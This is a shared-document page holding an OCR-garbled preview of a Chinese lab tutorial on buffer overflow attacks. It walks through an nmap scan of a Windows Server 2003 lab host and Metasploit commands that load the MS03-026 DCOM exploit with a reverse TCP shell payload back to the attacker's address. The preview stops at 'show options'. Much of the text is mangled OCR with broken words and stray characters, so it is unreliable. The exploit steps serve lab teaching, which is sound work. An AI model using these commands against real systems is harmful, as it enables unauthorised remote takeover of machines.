欢迎来到天天文库
浏览记录
ID:28466529
大小:241.09 KB
页数:4页
时间:2018-12-10
《缓冲区溢出攻击实验教程》由会员上传分享,免费在线阅读,更多相关内容在学术论文-天天文库。
1、1.实训目标获取B标主机的最高权限,利用远程桌面登录。理解ddos攻击的原理缓冲区溢出攻击原理一、实验环境实验环境两台预装Windows2000/XP/2003的主机,通过网络相连软件工具:metasploitfrmamework二、试验要求1、实训耍求:获取目标主机的最高权限三、实训步骤:1、攻击目标Windowsserver2003SPOHom©WindowsServer2003Sta...我的电脑网上邻soInternetExplorer2、攻击目的获取目标主机的最高权限,利用远程桌面登录并进行截图说明3、攻
2、击开始步骤1:使用nmap对目标进行端口扫描10.20.39.45vProfile:VScanCancenmap"T4"A"v10.20.39.45ServicesNmapOutputPorts/HostsTopologyHostDetailsScans▲nmap"T4*v10.20.39.45V1tDetailD.20.39.453.20.39.165Discoveredopenport1026/tcpon10.20.39.45CompletedSYNStealthScanat19:26,0.39selapsed
3、(1000totalports)InitiatingServicescanat19:26Scanning8serviceson10.20.39.45CompletedServicescanat19:27,48.52selapsed(8serviceson1host)Initiating05detection(try痒1)against10.20.39.45HSE:Scriptscanning10.20.39.45.InitiatingNSEat19:27CompletedNSEat19:27,22.08selaps
4、edWiaapscanreportfor10.20.39.45Hostis叫)(0.00016slatency).Notshown:992closedportsPORTSTATERVICEVERSIOH23/tcpopentelnetMicrosoftVBLndovisXPtelnetd80/tcpopenhttpMicrosoftIIShttpd6.0
5、http-methods:OPTIONSTPACEGETHEADPOST屋IPotentiallyriskymethods:TRACEI_Seehttp://nm
6、ap.org/nsedoc/scripts/http-methods.html
7、_htxp-title:xBDxA8xC9xE8xD6xD0135/tcpopennsrpcMicrosoftVti.ndcn7sRPC139/tcpopennettoios-ssn445/tcpopenmicroso£t-dsMicrosoft协ndans2003or2008jillvi.'usu£L1025/tcpopennsrpcMicrosoftV^ndcnisRPC1026/tcpopennsrpcMicrosof
8、tV^ndcnisRPC3389/tcpopenns-vi)t-serverMicrosoftTerminalServiceMACAddress:00:0C:29:18:6C:BI(VMware)Devicetype:generalpurposeTDi"i•MSIACl步骤2:目标开启135端口,可利用MS03-026漏洞进行入侵,用到的工具是metasploitfrmameworko(1)查询MS03-026漏洞所对应的溢出模块msf>searchms03-0261HatchingModulesRankDescr
9、iptionNameDisclosureDateIexploit/windows/deerpc/ws03026dcomfliw——2003-07-16greatMicrosoftRPCDCOMInterfaceOvermsf>useexploit/windows/deerpc/ms03026dcorn(2)进入此模块:有效载荷为执行特定命令,配::相关参数并显示出来msfexploit(msO3_O26_dcom)>setPAYLOADgeneric/shell_reverse_tcpPAYLOAD=>generi
10、c/shell_rever北Lcpmsfexploit(rt)sO3_O26_dcom)>setRHOST10.20.39.45RHOST=>10.20.39?45msfexploit(msO3_O26_dcom)>setLHOST10.20.39.6LHOST=>10.20.39:6-msfexploit(msO3_O26_dcom)>showoption
此文档下载收益归作者所有